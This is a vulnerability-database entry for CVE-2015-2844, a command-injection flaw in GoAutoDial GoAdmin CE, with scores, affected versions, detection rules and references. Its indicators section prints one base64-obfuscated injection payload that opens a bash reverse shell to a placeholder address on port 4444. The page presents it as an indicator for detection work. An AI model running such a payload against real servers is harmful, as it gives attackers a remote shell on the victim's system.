CVE-2015-2844
published 2015-05-12CVE-2015-2844: The cpanel function in go_site.php in GoAutoDial GoAdmin CE before 3.3-1420434000 allows remote attackers to execute arbitrary commands via the $action portion…
PriorityP270critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
12.72%
95.8th percentile
The cpanel function in go_site.php in GoAutoDial GoAdmin CE before 3.3-1420434000 allows remote attackers to execute arbitrary commands via the $action portion of the PATH_INFO.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| goautodial | goadmin_ce | — | — |
| goautodial | goadmin_ce | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command|| bash -c "eval \`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvNDQ0NCAwPiYx | base64 --decode\`"↗
- →Detect command injection attempts in the PATH_INFO of go_site.php targeting the cpanel function; look for shell metacharacters (e.g., '||', ';', '`') in the $action or $type URI segments under /index.php/go_site/cpanel/ ↗
- →Alert on HTTP requests to /index.php/go_site/cpanel/ containing base64-encoded payloads or pipe/bash subshell patterns, as attackers use base64 encoding to bypass web server encoding filters ↗
- →Detect the underlying exec call pattern in go_site.php: exec("/usr/share/goautodial/goautodialc.pl '/sbin/service $type ".strtolower($action)."'") — monitor process execution of goautodialc.pl spawning unexpected child processes ↗
- →Flag outbound /dev/tcp reverse shell connections initiated by bash, particularly from web server processes (e.g., apache/php) to external IPs on non-standard ports such as 4444 ↗
- ·Any GoAutoDial version between 3.3-1406088000 and 3.3-1421902800 may be vulnerable, not just the specific build listed in the CVE, as intermediate releases contained no relevant code fixes ↗
- ·The exploit PoC IP (192.168.0.11) and port (4444) are example attacker-controlled values from the PoC; real-world exploitation will use different callback addresses and ports ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://goautodial.org/news/21http://packetstormsecurity.com/files/131543/GoAutoDial-SQL-Injection-Command-Execution-File-Upload.htmlhttp://www.securityfocus.com/archive/1/535319/100/1100/threadedhttp://www.securityfocus.com/bid/74281https://www.exploit-db.com/exploits/36807/http://goautodial.org/news/21http://packetstormsecurity.com/files/131543/GoAutoDial-SQL-Injection-Command-Execution-File-Upload.htmlhttp://www.securityfocus.com/archive/1/535319/100/1100/threadedhttp://www.securityfocus.com/bid/74281https://www.exploit-db.com/exploits/36807/
2015-05-12
Published